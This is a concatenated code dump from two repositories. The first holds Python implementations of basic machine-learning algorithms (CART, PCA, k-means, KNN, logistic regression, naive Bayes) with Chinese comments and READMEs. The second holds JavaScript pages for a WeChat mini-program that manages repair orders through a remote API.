datas {numpy} -- 待分割的数据集
value {int or float or string} -- 分割参考值
column {int} -- 分割时使用的列
Returns:
truple -- 分割后的两个数据集
"""
data1 = []
data2 = []
if (isinstance(value, int) or isinstance(value, float)): # 连续型数据
for row in datas:
if (row[column] >= value):
data1.append(row)
else:
data2.append(row)
else: # 标签型数据
for row in datas:
if row[column] == value:
data1.append(row)
else:
data2.append(row)
return (data1, data2)
def buildDecisionTree(self, data):
'''
建立决策树
'''
self.decisionTree = self._build(data)
def _build(self, datas):
"""递归建立决策树
Arguments:
datas {numpy} -- 训练的数据集
Returns:
Tree -- 树的节点(叶子和非叶子)
"""
current_gain = self._gini(datas)
column_length = len(datas[0])
datas_length = len(datas)
best_gain = 0.0
best_value = None
best_set = None
# 找到最大的gain以及决定它的列和值
for col in range(column_length - 1):
col_value_set = set([x[col] for x in datas])
for value in col_value_set:
data1, data2 = self.split_datas(datas, value, col)
p = len(data1) / datas_length
gain = current_gain - p * self._gini(data1) - (
1 - p) * self._gini(data2)
if gain > best_gain:
best_gain = gain
best_value = (col, value)
best_set = (data1, data2)
dcY = {
'impurity': '%.3f' % current_gain,
'samples': '%d' % datas_length
}
# 通过miniGain进行剪枝
if best_gain > self.miniGain:
trueBranch = self._build(best_set[0])
falseBranch = self._build(best_set[1])
# 非叶子节点需要保存列号,分割的值以及左右子树
return Tree(col=best_value[0],
value=best_value[1],
trueBranch=trueBranch,
falseBranch=falseBranch,
summary=dcY)
else:
# 叶子节点保存值
return Tree(results=self._cal_labels_count(datas),
summary=dcY)
def classify(self, data):
'''
利用决策树进行分类
'''
return self._classify(data, self.decisionTree)
def _classify(self, data, tree):
"""递归查找决策树,查找分类
Arguments:
data {numpy} -- 测试数据
tree {Tree} -- 树的节点
Returns:
string -- 类别
"""
# 叶子节点直接返回
if tree.results is not None:
return tree.results
branch = None
v = data[tree.col]
if isinstance(v, int) or isinstance(v, float):
if v >= tree.value:
branch = tree.trueBranch
else:
branch = tree.falseBranch
else:
if v == tree.value:
branch = tree.trueBranch
else:
branch = tree.falseBranch
return self._classify(data, branch)
<file_sep>/PCA/pca.py
# -*- coding: utf-8 -*-
import numpy as np
class PCA:
def __init__(self, k):
self.k = k
def zero_mean(self, data):
"""零均值化
Arguments:
data {numpy} -- 传入数据,m行n列表示m条数据n维特征
Returns:
numpy, numpy -- 零均值化后的数据和均值
"""
# print('data.shape:', data.shape)
mean_data = np.mean(data, axis=0) # 对列求均值
# print('mean.shape:', mean_data.shape)
mean_data = np.tile(mean_data, (data.shape[0], 1)) # 对源数据进行复制扩充到m行
data = data - mean_data
return data, mean_data
def fit_transform(self, data):
"""计算pca
Arguments:
data {numpy} -- 原始待降维数据 m * n
Returns:
numpy -- 降维后的数据 m * k
"""
data, mean_data = self.zero_mean(data)
m, n = np.shape(data) # m个数据n个特征
covX = np.cov(data.T) # 计算协方差矩阵
feat_value, feat_vec = np.linalg.eig(covX) # 求解协方差矩阵的特征值和特征向量
# print('feat_value:', feat_value)
# print('feat_vec', feat_vec)
index = np.argsort(-feat_value) # 按照特征值进行从大到小排序返回下标
k_vector = np.matrix(feat_vec.T[index[:self.k]]).T # 取前k项
new_data = data * k_vector
# print(new_data)
return new_data
<file_sep>/README.md
# MachineLearning
机器学习与大数据领域的基础算法的个人实现代码
## 目录
1. [Kmeans](https://github.com/Renl1001/MachineLearning/tree/master/Kmeans)
2. [KNN](https://github.com/Renl1001/MachineLearning/tree/master/KNN)
3. [Logistic Regression](https://github.com/Renl1001/MachineLearning/tree/master/LogisticRegression)
4. [Softmax Regreesion](https://github.com/Renl1001/MachineLearning/tree/master/SoftmaxRegression)
5. [BP神经网络](https://github.com/Renl1001/MachineLearning/tree/master/BP)
6. [CART](https://github.com/Renl1001/MachineLearning/tree/master/CART)
7. [贝叶斯方法](https://github.com/Renl1001/MachineLearning/tree/master/NaiveBayes)
8. [PCA](https://github.com/Renl1001/MachineLearning/tree/master/PCA)
<file_sep>/LogisticRegression/README.md
# KNN算法
## 算法流程
1. 加载训练数据和测试数据;
2. 计算预测函数h(x);
3. 计算损失函数J(w);
4. 根据误差修改回归权重参数;
5. 重复2.- 4. n次(最大迭代次数)
## 结果
加载训练数据:

其中紫色和黄色分别表示两种类别。
训练后,得到的分类曲线如图:

可以看到训练得到的曲线能够比较好的将两种类别的点分割开来。
对测试集进行分类,得到测试集的标签如下图所示:

<file_sep>/Kmeans/kmeans.py
import numpy as np
class KMeans():
def __init__(self, k=3):
self._k = k
self._labels = None
self._mdist = None
self.step = None
def _eclud_dist(self, p1, p2):
"""计算两点之间的欧拉距离
Arguments:
p1 {numpy} -- p1的坐标
p2 {numpy} -- p2的坐标
Returns:
float -- p1和p2的欧拉距离
"""
dist = np.sqrt(np.sum((p1-p2)**2))
return dist
def _rand_Centroid(self, data, k):
"""随机初始化质心
Arguments:
data {numpy} -- 所有点的坐标
k {int} -- 分类数
Returns:
numpy -- 质心数组 k * m
"""
m = data.shape[1] # 获取特征的维数
centroids = np.empty((k,m)) # 生成 k * m 的矩阵,用于存储质心
for i in range(m):
min_data = min(data[:, i]) # 计算第 i 维的最小值
max_data = max(data[:, i]) # 计算第 i 维的最大值
range_data = min_data + (max_data - min_data) * np.random.rand(k) # 随机生成 k 个范围在[min_data, max_data]之间的数
centroids[:, i] = range_data
return centroids
def fit(self, data):
"""k均值聚类的实现
Arguments:
data {numpy} -- 点的数据
"""
n = data.shape[0] #获取样本的个数
data_index = np.zeros(n) # 记录每个点对应的质心下标
data_min = np.zeros(n) # 记录每个点到质心的最短距离
for i in range(n):
data_min[i] = np.inf
self._centroids = self._rand_Centroid(data, self._k)
for step in range(500):
self.step = step+1
flag = False # 用来记录是否有点改变了质心
for i in range(n): # 循环遍历n个点
p1 = data[i,:] # 点的坐标
minDist = np.inf # 初始化点到质心的最小距离和下标
minIndex = -1
for j in range(self._k): # 遍历 k 个质心
p2 = self._centroids[j,:] # 质心坐标
dist = self._eclud_dist(p2, p1) # 计算距离
if dist < minDist: # 更新最短距离
minDist = dist
minIndex = j
if data_index[i] != minIndex:
flag = True
data_index[i] = minIndex
data_min[i] = minDist**2
if not flag: # 当所有点都没有更新质点的时候结束迭代
print('迭代次数:', step)
break
'''
更新质心
将质心中所有点的坐标的平均值作为新质心
'''
for i in range(self._k):
index_all = data_index #取出样本所属簇的索引值
value = np.nonzero(index_all==i) #取出所有属于第i个簇的索引值
ptsInClust = data[value[0]] #取出属于第i个簇的所有样本点
self._centroids[i,:] = np.mean(ptsInClust, axis=0) #计算均值
self._labels = data_index
self._mdist = sum(data_min)
def predict(self, X):
"""根据训练结果,来预测新的数据的分类
Arguments:
X {numpy} -- 要预测的数据
Returns:
numpy -- 预测结果
"""
n = X.shape[0] # 样本数量
preds = np.empty((n,))
for i in range(n):
minDist = np.inf # 记录最短距离
for j in range(self._k):
distJI = self._eclud_dist(self._centroids[j,:], X[i,:])
if distJI < minDist:
minDist = distJI
preds[i] = j
return preds
if __name__ == "__main__":
'''
测试欧拉距离函数
'''
kmeans = KMeans(4)
p1 = np.array([0,0])
p2 = np.array([1,1])
print(kmeans._eclud_dist(p1, p2))
p1 = np.array([0,0])
p2 = np.array([3,4])
print(kmeans._eclud_dist(p1, p2))<file_sep>/PCA/README.md
# PCA算法
## 算法流程
1. 加载数据;
2. 对数据进行零均值化处理(将数据通过每一列求到每一个特征的平均值,然后所有数据减去它的平均值);
3. 求出数据的协方差矩阵;
4. 计算协方差矩阵的特征值和特征向量;
5. 对特征值进行排序,得到排序后的下标;
6. 取特征值前k大的特征向量;
7. 将零均值化后的数据与前k大的特征向量相乘得到降维后的数据。
## 结果
对数据进行降维后,得到二维的特征,其在二位坐标上的位置如下:
<file_sep>/SoftmaxRegression/make_data.py
# -*- coding: utf-8 -*-
import numpy as np
import random
if __name__ == "__main__":
file = open("train.txt", 'w')
n = 200
bag = [[-5,-5], [-5,5],[5,-5],[5,5]]
for label in range(4):
for i in range(n):
x = random.random()*5
y = random.random()*5
x += bag[label][0]
y += bag[label][1]
# if random.randint(0,10) < 1: # 随机加入干扰点
# lb = random.randint(0, 3)
# else:
# lb = label
lb = label
file.write('{}\t{}\t{}\n'.format(x, y, lb))
file.close()
file = open("test.txt", 'w')
n = random.randint(100,200)
for i in range(n):
x = random.random()*20-10
y = random.random()*20-10
file.write('{}\t{}\n'.format(x, y))
file.close()<file_sep>/NaiveBayes/test.py
# -*- coding:utf-8 -*-
from bayes import NaiveBayes
def loadDataSet():
train_samples = [
['my', 'dog', 'has', 'flea', 'problems', 'help', 'please'],
['maybe', 'not', 'take', 'him', 'to', 'dog', 'park', 'stupid'],
['my', 'dalmation', 'is', 'so', 'cute', ' and', 'I', 'love', 'him'],
['stop', 'posting', 'stupid', 'worthless', 'garbage'],
['mr', 'licks', 'ate', 'my', 'steak', 'how', 'to', 'stop', 'him'],
['quit', 'buying', 'worthless', 'dog', 'food', 'stupid']
]
test_samples = [['love', 'my', 'girl', 'friend'], ['stupid', 'garbage'],
['Haha', 'I', 'really', "Love", "You"],
['This', 'is', "my", "dog"]]
train_classes = [0, 1, 0, 1, 0, 1] # 0:good; 1:bad
return train_samples, train_classes, test_samples
if __name__ == "__main__":
train_samples, train_classes, test_samples = loadDataSet()
clf = NaiveBayes()
clf.train(train_samples, train_classes)
# test:
for item in test_samples:
clf.classify(item)
<file_sep>/LogisticRegression/test.py
# -*- coding: utf-8 -*-
import pandas as pd
import numpy as np
import random
from logistic_regression import LogisticRegression
import matplotlib.pyplot as plt
# 加载数据集,DataFrame格式,最后将返回为一个matrix格式
def loadDataset(infile):
df = pd.read_csv(infile, sep='\t', header=0, dtype=str, na_filter=False)
data = np.array(df).astype(np.float)
return data
# 绘制图形
def show_data(data, label, title, weights=None):
plt.cla()
plt.scatter(data[:, 0], data[:, 1], c=label)
if weights is not None:
weights = weights.getA()
print(weights[0],weights[1])
x = np.arange(0, 10, 0.1)
y = - weights[0] * x / weights[1]
plt.plot(x, y)
plt.title(title)
plt.axis([0,10,0,10])
outname = "./save/{}.png".format(title)
plt.savefig(outname)
plt.show()
if __name__=='__main__':
train = loadDataset('train.txt')
test = loadDataset('test.txt')
train_X = train[:, :2]
train_y = train[:, 2]
test_X = test
show_data(train[:,:2], train[:, 2], 'data')
clf = LogisticRegression()
weights = clf.fit(train_X, train_y)
show_data(train[:,:2], train[:, 2], 'train', weights)
# print(weights.shape)
pre_y = clf.predict(test)
show_data(test_X, pre_y[:,0], 'test', weights)
<file_sep>/KNN/KNN.py
# -*- coding: utf-8 -*-
import numpy as np
import operator
class KNN():
def __init__(self, k=3):
self._k = k
def _eclud_dist(self, test, train_X):
"""计算欧式距离并排序
Arguments:
test {list} -- 测试点的X
train_X {list} -- 训练集
Returns:
numpy -- 测试点与每个点之间的距离进行排序后的下标
"""
m = train_X.shape[0] # 得到训练集的数量
diffMat = np.tile(test, (m,1)) - train_X # 计算测试点的每个维度与训练数据的差值
sqDiffMat = diffMat**2 # 每个元素求平方
sqDistances = sqDiffMat.sum(axis = 1) # 计算得到差值的平方和
distances = sqDistances ** 0.5 # 开根得到欧式距离
return distances.argsort() #按距离的从小到达排列的下标值
def classify_one(self, sample, train_X, train_y):
"""对一个样本进行分类
Arguments:
sample {list} -- 要分类的点的坐标
train_X {list} -- 训练集的X
train_y {list} -- 训练集的y
Returns:
int -- sample的标签y
"""
sortedDistances = self._eclud_dist(sample, train_X)
classCount = {}
max_y = -1
max_num = 0
for i in range(self._k):
oneVote = train_y[sortedDistances[i]] #获取最近的第i个点的类别
classCount[oneVote] = classCount.get(oneVote, 0) + 1
if classCount[oneVote] > max_num:
max_num = classCount[oneVote]
max_y = oneVote
return max_y
def classify(self, test_X, train_X, train_y):
"""对测试集test_X进行分类
Arguments:
test_X {list} -- 测试集的X
train_X {list} -- 训练集的X
train_y {list} -- 训练集的y
Returns:
list -- 测试集的标签
"""
labels = []
for i in range(len(test_X)):
sample = test_X[i]
label = self.classify_one(sample, train_X, train_y)
labels.append(label)
return labels
if __name__=="__main__":
train_X = [[1, 2, 0, 1, 0],
[0, 1, 1, 0, 1],
[1, 0, 0, 0, 1],
[2, 1, 1, 0, 1],
[1, 1, 0, 1, 1]]
train_y = [1, 1, 0, 0, 0]
clf = KNN(k = 3)
sample = [[1,2,0,1,0],[1,2,0,1,1]]
result = clf.classify(sample, train_X, train_y)
|
d3db6f0795c5efda0d60b62441bae3ac75cc5bb9
|
[
"Markdown",
"Python"
] | 26
|
Markdown
|
Renl1001/MachineLearning
|
03447867b6ab6a8add4b62e0636e2585e5a1297e
|
86d466b0b0b2e0218c1360fd24f2eff57a8549bc
|
refs/heads/master
|
<file_sep># UdacityMovieSite
Create a static html page to display some movies. Uses The MovieDB API
Run entertainment_center.py to start
<file_sep>import webbrowser
class Movie():
def __init__(self, movie_title, movie_storyline, poster_image, trailer_youtube_url):
"""Represents a movie.
Keyword arguments:
movie_title -- the title
movie_storyline -- the storyline
psoter_image -- link to an image of the movie poster
trailer_youtube_url -- url to the trailer of the movie on youtube
"""
self.title = movie_title
self.storyline = movie_storyline
self.poster_image_url = poster_image
self.trailer_youtube_url = trailer_youtube_url
def show_trailer(self):
"""Opens a webpage with the youtube trailer
"""
webbrowser.open(self.trailer_youtube_url)<file_sep>import media
import fresh_tomatoes
import requests
import tmdbsimple as tmdb
import json
#Api Key for The Movie DB
tmdb.API_KEY = "<KEY>"
#URL for a 'collection' (A group of movies on the TMDB website - eg. Star Wars movies, Indiana Jones films etc.)
collectionURL = "https://api.themoviedb.org/3/collection/10194?language=en-US&api_key=<KEY>"
#Use requests to get a response from
response = requests.request("GET", collectionURL)
collection = json.loads(response.text)
movies = []
#In the JSON object collection, 'parts' contains a list of movies.
#Loop through these movies and add an instance of the class Movie for each JSON object
for movie in collection['parts']:
fullPosterPath = "https://image.tmdb.org/t/p/w1280" + movie['poster_path']
movies.append((media.Movie(movie['title'], movie['overview'],
fullPosterPath,
"https://www.youtube.com/watch?v=KYz2wyBy3kc")))
#Fresh Tomatoes do your thang
fresh_tomatoes.open_movies_page(movies)
|
b41d655064916643f9631cf28742d3302b235679
|
[
"Markdown",
"Python"
] | 3
|
Markdown
|
edwardjackchandler/UdacityMovieSite
|
08d0c98ae812b5fc83b986f6b1387e3df884797b
|
270f4090edbae7370769771c416a60797f09e827
|
refs/heads/master
|
<repo_name>APenketh/ansible-vultr-automation<file_sep>/startup-scripts/README.md
# Startup Scripts
This folder contains any useful bash scripts which can be copied into the function within Vultr to be ran upon creation of a new server. This is especially useful for granting access to a new server with a pre-made SSH key or other provisioning functions.
<file_sep>/README.md
# ansible-vultr-automation
This Repo Provides Scripts & Playbooks To Use With Ansible For Automating Tasks At The Hosting Provider Vultr
<file_sep>/startup-scripts/add-ansible-user.sh
#!/bin/bash
#Add Ansible User To The System
adduser ansible
# Give Ansible User Sudo Permissions
echo "ansible ALL = (ALL) NOPASSWD: ALL" >> /etc/sudoers
visudo -cf /etc/sudoers
# Add required directory's for SSH Key access
mkdir /home/ansible/.ssh/
chmod 700 /home/ansible/.ssh/
touch /home/ansible/.ssh/authorized_keys
chmod 600 /home/ansible/.ssh/authorized_keys
chown -R ansible:ansible /home/ansible/.ssh/
# Add The Pub Key In For Ansible Access - Makre sure to replace this with your key!
echo "{replace_with_pub_key}" >> /home/ansible/.ssh/authorized_keys
|
343b37e26ec2e65cac608a850eb126a0528be180
|
[
"Markdown",
"Shell"
] | 3
|
Markdown
|
APenketh/ansible-vultr-automation
|
75750da5988aa63df78a5a61fc348e1404d94cc3
|
c5980f42fe323745a7262aa0f8c680ad264b630b
|
refs/heads/master
|
<repo_name>Byluolu0/trackstar<file_sep>/protected/commands/shell/RbacCommand.php
<?php
class RbacCommand extends CConsoleCommand
{
private $_authManager;
public function getHelp()
{
return <<<EOD
USAGE
rbac
DESCRIPTION
This command generates an initial RBAC authorization hierarchy.
EOD;
}
/**
* Execute the action.
* @param array command line parameters specific for this command
*/
public function run($args)
{
//ensure that an authManager is defined as this is mandatory for creating an auth heirarchy
if(($this->_authManager=Yii::app()->authManager)===null)
{
echo "Error: an authorization manager, named 'authManager' must be configured to use this command.\n";
echo "If you already added 'authManager' component in application configuration,\n";
echo "please quit and re-enter the yiic shell.\n";
return;
}
//provide the opportunity for the use to abort the request
echo "This command will create three roles: Owner, Member, and Reader and the following premissions:\n";
echo "create, read, update and delete user\n"; echo "create, read, update and delete project\n";
echo "create, read, update and delete issue\n"; echo "Would you like to continue? [Yes|No] ";
//check the input from the user and continue if they indicated yes to the above question
if(!strncasecmp(trim(fgets(STDIN)),'y',1))
{
//create a general task-level permission for admins
$this->_authManager->createTask("adminManagement", "access to the application administration functionality");
//create the site admin role, and add the appropriate permissions
$role=$this->_authManager->createRole("admin");
$role->addChild("owner");
$role->addChild("reader");
$role->addChild("member");
$role->addChild("adminManagement");
//ensure we have one admin in the system (force it to be user id #1)
$this->_authManager->assign("admin",1);
//provide a message indicating success
echo "Authorization hierarchy successfully generated.";
}
}
}
|
45240a39134708c50487a2c3a060159ff79bade4
|
[
"PHP"
] | 1
|
PHP
|
Byluolu0/trackstar
|
030fa7f7ecf283753eb616aa00c3730c2024576e
|
dbec576771f954ab998381263376b1adf88a0541
|
refs/heads/master
|
<file_sep><div id="stage">
<div id="playback-controls">
Reading rate:
1×
</div>
<div id="text">
<div id="original-text">
</div>
</div>
<div id="word">
</div>
</div>
## Notes
First you generate the mp3 from the source file `test.txt` with MacOS
`say`.
The trouble is it has to read the entire file out loud in real time when
generating the word timestamps.
There are bugs with MacOS `Say`'s interactive mode where certain
punctuation throws off the word-highlighting. To get around this, I have
stripped out most non-alphanumeric characters, leaving only a few that
don't seem to cause problems. This means that the text above isn't the
same as the source text. You also lose line breaks.
<file_sep>#!/bin/zsh
#use macos `say` to convert speech to text with word timings
#`say` seems to have some bugs in interactive mode, where it highlights the word it is speaking
#you seem to get different errors depending on the terminal size
#various puncutation seems to throw it off highlighting the correct characters
#whenever there is punctuation on its own, it will break it
#adapted from https://stackoverflow.com/questions/33768852/can-i-interact-with-the-output-of-the-osx-say-command-in-a-bash-script
#when it is highlighting the text, the control characters are:
#$'\033'\[7mTHE WORD IS HERE$'\033'\(B$'\033'\[m
#the following sentence breaks the interactive mode of speak:
#Living — isn’t that precisely a will to be something different from what this nature is?
#==== issues:
# dashes, colons, ’ those kind of apostrophes instead of ' those
# you can't [easily] rebuild the source file from this, because we're stripping it of stuff...
if ! [ -x "$(command -v say)" ]; then
echo 'Error: say is not installed' >&2
exit 1
fi
if ! [ -x "$(command -v ffmpeg)" ]; then
echo 'Error: ffmpeg is not installed' >&2
exit 1
fi
rm -f output.txt
zmodload zsh/datetime
sed -e ':a' -e 'N' -e '$!ba' -e 's/\n/ /g' -e "s/’/'/g" -e "s/ *[-,;\!\?']/ /g" test.txt | tr -cd "[:alnum:]._- ?\!;,'" | say --interactive | {
counter=0
while IFS= read -r -d $'\r' line; do
(( counter++ )) || continue # first line in the output of `say --interactive` suppresses the cursor; discard this line
timestamp=$EPOCHREALTIME
(( counter == 2 )) && offset=$timestamp # set the timestamp of the actual first line at the offset
(( timestamp -= offset ))
#printf '%05.2f %s\n' $timestamp "${${line%$'\e[m'*}#*$'\e[7m'}"
#printf "%q" "${line}" #see the control characters that we need to split on
first=${line%$'\033'\(B$'\033'\[m*}
last=${first#*$'\033'\[7m}
time=$(printf "%.0f\n" $(($timestamp * 1000)))
echo "<span class='ts-word' id='ts${time}'>${last}</span>" | tee -a output.txt
#line delimited json in amazon polly speech marks style, missing the byte start and end positions
#echo -e "{\"time\":${time}, \"word\":\"${last}\"}"
done
}
#generate the audio file
sed -e "s/’/'/g" test.txt | tr -cd "[:alnum:]._- ?!;,'" | say -o output.aac
#convert it to mp3, delete aac after
ffmpeg -i output.aac -acodec libmp3lame test.mp3 && rm output.aac
<file_sep>What is the objective? What is the problem statement? When confronted
with a lot of text that I need to read, I sometimes lose concentration
and never finish reading it. I find that I can finish audiobooks when I
can't finish reading written texts. Even if I don't retain much from
what I've listened to, I will often remember a dim outline of what was
covered, and my reaction to it. The aim is to assist myself in finishing
texts that I might otherwise abandon. The proposed method is to use a
text-to-speech synthesiser to read the text to me.
Text to speech garbles certain words and is sometimes hard to
understand. To assist with comprehension I would like the source text to
be displayed on screen. The current word being spoken should be
highlighted, and there should be a way to move around the text to change
what is being narrated.
I have made two attempts so far at solving the problem:
- [Web Speech Synthesis](web-speech-synthesis/)
- [Amazon Polly](amazon-polly/)
<file_sep>aws polly synthesize-speech \
--output-format json \
--voice-id "Brian" \
--text "`cat test.txt`" \
--speech-mark-types='["word", "sentence"]' \
test.json
aws polly synthesize-speech \
--output-format mp3 \
--voice-id "Brian" \
--text "`cat test.txt`" \
test.mp3
|
b848f5f82f28345f209d6aa045f5555c5c12b9cc
|
[
"Markdown",
"Shell"
] | 4
|
Markdown
|
rrjanbiah/tts
|
db4f549e380534bcbef47853a4585068b2400077
|
410fe480ed7880946deb24290952b6a5ae1d10ee
|
refs/heads/master
|
<file_sep>import React, { Component } from "react";
class MyTimer extends Component {
constructor(props) {
super(props);
this.state = {
date: new Date()
};
}
componentDidMount() {
console.log("Le composant a été monté");
setInterval(() => this.timer(), 1000);
}
componentDidUpdate() {
console.log("Le composant a été mis à jour");
}
timer() {
this.setState({
date: new Date()
});
}
render() {
return (
<div>
<h1>Il est:</h1>
<h2>{this.state.date.toLocaleTimeString()}</h2>
</div>
);
}
}
export default MyTimer;
<file_sep>const db = require(`../models/index.js`);
/**
* Class Pages Controller
*/
class AboutController {
/**
* Page about
* @param {*} req
* @param {*} res
*/
auth(req, res) {
console.log("methode about authcontroller");
db.Users.findAll().then(users => res.render("pages/auth", { users }));
}
signup(req, res) {
console.log("dans signup");
const datas = req.body;
db.Users.create(datas).then(user => {
console.log("object");
console.log(datas);
res.send("Tout est envoyé vers la bdd");
});
}
}
module.exports = AboutController;
<file_sep>import React, { Component } from "react";
class SignUp extends Component {
constructor(props) {
super(props);
this.state = {
email: "<EMAIL>"
};
this.updateEmailField = this.updateEmailField.bind(this);
}
updateEmailField(e) {
e.preventDefault();
this.setState({ email: e.target.value });
}
render() {
return (
<div>
<h2>Quete Création Composant Email:</h2>
<label for="email">Email : </label>
<input
type="email"
name="email"
placeholder={this.state.email}
id="email"
onChange={this.updateEmailField}
/>
<p>Voici mon email: {this.state.email}</p>
</div>
);
}
}
export default SignUp;
<file_sep># Desroches_Benjamin
Quete suivie React
<file_sep>const express = require("express");
const router = express.Router();
/* GET auth page. */
const AuthController = require("../controllers/AuthController");
const controller = new AuthController();
router.get("/", (req, res) => {
console.log("je suis dans le get");
controller.auth(req, res);
});
router.post("/signup", (req, res) => {
console.log("je suis dans le post");
controller.signup(req, res);
});
module.exports = router;
|
1b0597beb84cb0d8799d7effcad697d351d6585e
|
[
"JavaScript",
"Markdown"
] | 5
|
JavaScript
|
BenOtsoa/Desroches_Benjamin
|
8446e6f78715a758a43da4603772b46a4f0e7e39
|
bd76a29258ab17daff3a5240f326144e7d0e3007
|
refs/heads/master
|
<file_sep>// pages/detail_maintainer/detail_maintainer.js
Page({
data: {
currentTabIndex:0,
top:["维修中","已完成"]
},
onTabsItemTap:function(e){
var that = this
let index=e.currentTarget.dataset.index;
this.setData({
currentTabIndex:index
})
var name_maintainer = wx.getStorageSync('name')
wx.request({
url: 'https://www.bbin.design/api/detail_detail2_maintainer.php',
data:{
name_maintainer:name_maintainer
},
success:function(res){
console.log(res)
that.setData({
list2:res.data
})
}
})
},
click:function(e){
var id_pages = e.currentTarget.dataset.id
var index = e.currentTarget.dataset.index
wx.setStorageSync('id_pages', id_pages)
wx.navigateTo({
url: '/pages/detail_detail1_maintainer/detail_detail1_maintainer?index='+index,
})
},
onLoad: function (options) {
var that = this
var name_maintainer = wx.getStorageSync('name')
console.log(name_maintainer)
wx.request({
url: 'https://www.bbin.design/api/detail_detail1_maintainer.php',
data:{
name_maintainer:name_maintainer
},
success:res =>{
console.log(res.data)
this.setData({
list:res.data
})
}
})
},
/**
* 生命周期函数--监听页面初次渲染完成
*/
onReady: function () {
},
/**
* 生命周期函数--监听页面显示
*/
onShow: function () {
},
/**
* 生命周期函数--监听页面隐藏
*/
onHide: function () {
},
/**
* 生命周期函数--监听页面卸载
*/
onUnload: function () {
},
/**
* 页面相关事件处理函数--监听用户下拉动作
*/
onPullDownRefresh: function () {
},
/**
* 页面上拉触底事件的处理函数
*/
onReachBottom: function () {
},
/**
* 用户点击右上角分享
*/
onShareAppMessage: function () {
}
})<file_sep>// pages/login_administrator/login_administrator.js
Page({
/**
* 页面的初始数据
*/
data: {
},
detail:function(){
wx.navigateTo({
url: '/pages/help3/help3',
})
},
login:function(e){
if(e.detail.value.no_administrator == '' || e.detail.value.no_administrator == null ||e.detail.value.pass_administrator == '' || e.detail.value.pass_administrator == null){
wx.showToast({
title: '请填写完整信息!',
})
}else{
wx.request({
url: 'https://www.bbin.design/api/login_administrator.php',
data:{
no_administrator:e.detail.value.no_administrator,
pass_administrator:e.detail.value.<PASSWORD>,
},
success:function(res){
console.log(res.data)
if(res.data.no_administrator == e.detail.value.no_administrator && res.data.pass_administrator == e.detail.value.pass_administrator){
wx.showToast({
title: '登录成功!',
icon:"success",
})
setTimeout(function(){
wx.navigateTo({
url:'/pages/pages_administrator/pages_administrator'
})
},1500)
}else{
wx.showToast({
title: '账号或密码错误!',
icon:"error"
})
}
}
})
}
},
/**
* 生命周期函数--监听页面加载
*/
onLoad: function (options) {
},
/**
* 生命周期函数--监听页面初次渲染完成
*/
onReady: function () {
},
/**
* 生命周期函数--监听页面显示
*/
onShow: function () {
},
/**
* 生命周期函数--监听页面隐藏
*/
onHide: function () {
},
/**
* 生命周期函数--监听页面卸载
*/
onUnload: function () {
},
/**
* 页面相关事件处理函数--监听用户下拉动作
*/
onPullDownRefresh: function () {
},
/**
* 页面上拉触底事件的处理函数
*/
onReachBottom: function () {
},
/**
* 用户点击右上角分享
*/
onShareAppMessage: function () {
}
})<file_sep>const app = getApp()
var util= require('../../utils/util.js')
var timestamp = Date.parse(new Date());
timestamp = timestamp / 1000;
var n = timestamp * 1000;
var datee = util.formatTime(new Date())
Page({
data: {
},
onLoad: function (options) {
//console.log(options.index)
var no_pages = wx.getStorageSync('no')
var id_pages = wx.getStorageSync('id_pages')
//console.log(id_pages)
wx.request({
url: 'https://www.bbin.design/api/detail_1_maintainer.php',
headers: {
'content-type':'application/json'
},
data:{
id_pages:id_pages
},
success: res => {
//console.log(res.data)
//将获取到的json数据,存在名字叫list的这个数组中
this.setData({
list: res.data,
//res代表success函数的事件对,data是固定的,list是数组
})
}
})
},
onPullDownRefresh:function()
{
this.onLoad()
wx.showNavigationBarLoading() //在标题栏中显示加载
//模拟加载
setTimeout(function()
{
// complete
wx.hideNavigationBarLoading() //完成停止加载
wx.stopPullDownRefresh() //停止下拉刷新
},1500);
},
formSubmit:function(e){
//console.log(e.detail.value.time_pages)
var FormData = e.detail.value;
var name_maintainer = wx.getStorageSync('name')
var phone_maintainer = wx.getStorageSync('phone')
//console.log(name_maintainer,phone_maintainer)
wx.request({
url: 'https://www.bbin.design/api/repairingpages.php',
header: {
"Content-Type": "application/x-www-form-urlencoded"
},
method: "POST",
data:{
id_pages:FormData.id_pages,
name_maintainer:name_maintainer,
phone_maintainer:phone_maintainer,
name_pages:FormData.name_pages,
phone_pages:FormData.phone_pages,
now_pages:FormData.now_pages,
addr_pages:FormData.addr_pages,
detail_pages:FormData.detail_pages,
grade_pages:FormData.grade_pages,
time_pages:FormData.time_pages,
add_maintainer:datee,
finish_maintainer:"暂无",
},
success:function(res){
//console.log("success")
wx.request({
url: 'https://www.bbin.design/api/delfromallpages.php',
data:{
id_pages:FormData.id_pages
}
})
wx.showToast({
title: '接单成功!',
icon: 'success',
duration:1000,
success: function () {
setTimeout(function () {
wx.navigateTo({
url: '/pages/home_maintainer/home_maintainer',
})
}, 1500);
var page = getCurrentPages().pop();
if (page == undefined || page == null) return;
page.onLoad();
},
})
}
})
}
})
<file_sep>// pages/addpapes_repairer/addpages_repairer.js
const app = getApp()
var util= require('../../utils/util.js')
Page({
data: {
},
onLoad:function(res){
var timestamp = Date.parse(new Date());
timestamp = timestamp / 1000;
var n = timestamp * 1000;
var datee = util.formatTime(new Date())
var no_pages = wx.getStorageSync('no')
var name_pages = wx.getStorageSync('name')
var phone_pages = wx.getStorageSync('phone')
var th=this; //成功后数据改变,复制对象
wx.request({
url: 'https://www.bbin.design/api/addpages.php',
header: {
'content-type':'application/json'
},
method: 'GET',
success: function(res) {
console.log(res);
th.setData({
list:res.data,
no_pages :no_pages,
name_pages :name_pages,
phone_pages :phone_pages,
id_pages:timestamp,
now_pages:datee
})
},
fail: function(res) {
console.log("-----fail-----");
},
})
},
// chooseImg:function(){
// var that = this;
// wx.chooseImage({
// count: 2, // 默认9
// sizeType: ['original', 'compressed'], // 可以指定是原图还是压缩图,默认二者都有
// sourceType: ['album', 'camera'], // 可以指定来源是相册还是相机,默认二者都有
// success: function (res) {
// // 返回选定照片的本地文件路径列表,tempFilePath可以作为img标签的src属性显示图片
// var tempFilePaths = res.tempFilePaths;
// console.log(res)
// that.setData({
// img_l:res.tempFilePaths
// })
// }
// })
// },
// up_img:function() {
// var that = this;
// wx.uploadFile({
// url: 'https://www.bbin.design/api/addimg.php', //接口
// filePath: that.data.img_l[0],
// name: 'file',
// formData: {
// 'user': 'test'
// },
// success: function (res) {
// wx.showToast({
// title: '上传成功',
// duration:500
// })
// var data = res.data;
// console.log(data);
// //do something
// },
// fail: function (error) {
// console.log(error);
// }
// })
// },
// preview_img:function(){
// wx.previewImage({
// current: this.data.img_l, // 当前显示图片的http链接
// urls: this.data.img_l // 需要预览的图片http链接列表
// })
// },
